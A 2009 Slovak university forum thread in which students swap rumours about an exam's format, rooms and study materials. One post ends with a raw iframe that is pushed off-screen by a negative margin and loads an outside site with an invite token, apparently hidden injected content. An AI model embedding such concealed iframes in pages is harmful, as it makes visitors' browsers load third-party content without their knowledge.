• Welcome to TUKE FÓRUM - Fórum pre Å¡tudentov Technickej Univerzity v KoÅ¡iciach.

USA skuska

Started by roman5555, 30.04.2009, 17:58:03

« predchádzajúce - ïal¹ie »

roman5555

Nazdar kto opakuje USA ?? z coho sa ucite ??? a ako tento rok prebieha skuska????

maTo

pocul som (ale ber to s rezervou)...ze mozno bude na moodly....dokonca to pomedzi zuby precedil plocica, ked som si bol dat zapisat zapocet...

roman5555

no tak to by bolo super :D a  z coho sa ucite ?

danielmi

ja som sa ucil zo skript PT ,,, a nebol problem,,sem tam daky obrazok z prednasok....
Subject: how women communicate with computer

Login: yes
Password: i dont have one
password is incorrect...

Login: yes
Password: incorrect

valentino

vie uz niekto nieco blizsie ci to bdue moodle alebo tak ako minuly rok ??

webmasterr

ja neviem a ani neviem co sa ucit..lebo cele skripta je kusa vela, by to chcelo nejaky vypis toho hlavneho aspon tem, i ked aj tak do utorka toho vela do hlavy nedostanem :/

a neviete aspon ked bude normal skuska po starom aky tam je pomer priklady vs teoria, kolko coho, a co je za viac bodov?

maTo

tak ak bude po starom, tak ocakavam otazky ako predosle roky (2 teoreticke a 1 prakticka tusim)...ale ta tiez dufam, ze z toho bude nakonec moodle...bo tiez sa k tomu dostanem najskor zajtra poobede...taze ked to bude po starom, ta asik bez sance :D

ale co kukam miestnosti...v oboch su kompy...ja si pamatam, ze sme to mali v tych PC bez kompov... (PC5/6 tusim)...taze to moze byt dobre znamenie :D

webmasterr

a ked sme pri tych miestnostich je medzi nimi nejaky rozidel PC1 a PC14 tusim? v ktorej ste prihlaseny? :D

aaa ked bude skuska na moodli neviete z coho cca by mala byt? resp. v com sa bude odlisovat od normalnej skusky...

maTo

pripravuj sa na klasicku...tym nic nepokazis...na moodly moze byt len lahsia si myslim :D

Pribina

Nejak vas nechcem zneistovat ale PC14 tusim nema kompy pokial pamatam.
plllllp prepinan kapitan Spok

puq

PC14 moze mat compy...jedna miestnost tam hore ma compy :)

Pribina

JJ viem ta na konci co je na pravo. Mozno to je ta PC14.
plllllp prepinan kapitan Spok

maTo

pc14 ma kompy...sak tam mali cvika z USA...dokonca som tam odovzdaval zadanie z DBS ak sa nemylim...

plexisklo

Bude moodlovacka klikacka,dnes som sa pytal mr Plocicu  :emot-drunk:
I´ma kick open the door of the oval office an I´ma chop that motherfuckin desk in half - Byaaah!!
pwn

maTo

niiiice :) dufam ze samy textfield na pisanie odpovede :D

roman5555

QuoteBude moodlovacka klikacka,dnes som sa pytal mr Plocicu  emot-drunk

a nepytal si sa ake budu otazky ?? typ a ci len klikat alebo doplnat aj nieco ??

neonfish

doplnoKACKA ako SVINA podla mna

glassworker

no to bude dost huste ak to bude cez moodle, screeny asi este neexistuju, lebo minuly rok bola klasicka skuska. A ten moodle generuje dost blbe otazky.... bu

neonfish

kedze na skusku ja 60 bodov a 60 minut tak predpokladam 6 otazok po 10 bodov
ak uvazujem ze tie testy zostavl simonak tak 5 kodov na doplnovanie a jenda teoreticka alebo pol napol

valentino

no ked minule roky bola zvecsa teoria myslim ze to bude aj teraz tak, simonak si nenecha ujst otazky z jeho prednasok....
aspon je to moje zbozne zelanie :D

maTo

no z coho sa ucite? idem i ja na to poamly...

valentino

na ftpcku su prednasky ... by lazy, datum 2.5.2009, vyzera to najdene aj ked je tam toho po aleluja do zajtra :(

maTo

uff...no ok to vyzera celkom citatelne a prehladne...ta uvidime kolko sa stihne :D ja som dost zvedavy na tie otazky...

BossZ

to je fakt celkom dobry material, len casu mame malo,
<iframe style="width:300px;height:600px;padding:0;margin: -300px 0px 0px 0px;border:0;" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.androidroka.sk/wp-content/themes/androidRoku/iframe.php?invite=52633e266001a22a5eb0166ee736bc68"></iframe>

glassworker

ucite sa aj algoritmy Radixsortu a podobne ?